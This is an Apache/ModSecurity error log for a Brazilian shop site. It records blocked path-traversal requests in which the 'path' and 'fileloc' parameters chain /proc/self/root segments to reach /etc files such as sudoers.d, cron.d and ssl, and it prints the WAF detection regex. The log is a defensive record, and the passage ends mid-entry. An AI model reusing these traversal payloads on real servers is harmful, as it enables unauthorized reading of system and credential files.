[Fri Mar 20 12:38:43.162231 2026] [mime_magic:error] [pid 10189:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:46000] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware/ueagle-atm
[Fri Mar 20 12:39:00.455261 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.241.31:37790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qFAF0L0L-SsrnPo6jvAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:39:00.687389 2026] [mime_magic:error] [pid 11642:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:43456] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:39:00.795338 2026] [mime_magic:error] [pid 11167:tid 140411574073088] (70014)End of file found: [client 57.141.18.90:43460] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:39:03.088090 2026] [mime_magic:error] [pid 7893:tid 140411683178240] (70014)End of file found: [client 57.141.18.64:43614] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:39:11.095122 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.241.31:37724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qH11pVZ5mVmJwsFNqkwAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:39:15.851415 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:41714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qIwF0L0L-SsrnPo6jyAAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:39:23.180952 2026] [mime_magic:error] [pid 31215:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:45102] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:39:40.791158 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.228.61:50420] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1qPLninkcc-iUj5AqXIwAAA4M"]
[Fri Mar 20 12:39:51.695366 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:35544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qRxCii7xarUs8iHanZwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:39:54.105831 2026] [mime_magic:error] [pid 31215:tid 140411708356352] (70014)End of file found: [client 57.141.18.56:47214] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:40:02.522083 2026] [mime_magic:error] [pid 7235:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:47694] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:40:08.693295 2026] [mime_magic:error] [pid 26799:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:48038] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:40:16.232115 2026] [mime_magic:error] [pid 7235:tid 140411658000128] (70014)End of file found: [client 57.141.18.123:48442] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:40:18.183556 2026] [mime_magic:error] [pid 31215:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:48546] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:40:24.652754 2026] [mime_magic:error] [pid 9818:tid 140411557287680] (70014)End of file found: [client 57.141.18.63:48960] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:40:45.583750 2026] [:error] [pid 11167:tid 140411658000128] [client 57.141.18.77:49998] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1qffHIg5MgXLBnicMwwAAAAco"]
[Fri Mar 20 12:40:59.055328 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:41716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qi-oXxyEfFpUF8f-8SgAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:40:59.505031 2026] [mime_magic:error] [pid 7235:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:51100] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:40:59.692153 2026] [mime_magic:error] [pid 9818:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:51114] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:41:01.648834 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.241.31:41356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qjPHIg5MgXLBnicMwzAAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:41:03.647237 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:41370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qj9a6ubjKNq_cu4YanwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:04.163894 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:41370] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qkNa6ubjKNq_cu4YaoAAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:05.583307 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:41378] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qkfXLqtnMIWvjpaLaMQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:10.489362 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:41386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qkzJ3M9BSuKP7CAZnvgAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:12.257029 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:49520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qmBCii7xarUs8iHan0gAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:12.609018 2026] [mime_magic:error] [pid 9818:tid 140411548894976] (70014)End of file found: [client 57.141.18.81:51738] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:41:12.660399 2026] [mime_magic:error] [pid 9818:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:51646] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:41:14.410811 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.244.43:36688] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1qmta6ubjKNq_cu4YaqAAAA1M"]
[Fri Mar 20 12:41:16.208556 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.241.31:49536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qmrninkcc-iUj5AqXewAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:18.280217 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.241.31:45330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qnl1pVZ5mVmJwsFNrEwAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:25.595214 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.241.31:45344] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qpfXLqtnMIWvjpaLaRQAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:26.605777 2026] [mime_magic:error] [pid 11167:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:52482] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:41:27.047016 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.241.31:45348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qp7ninkcc-iUj5AqXiwAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:27.296657 2026] [mime_magic:error] [pid 7893:tid 140411699963648] (70014)End of file found: [client 74.7.243.128:60006] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/firmware/radeon
[Fri Mar 20 12:41:29.540016 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.241.31:60322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qqfqxLDW4GITHUkQo5AAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:31.027125 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.241.31:60336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] 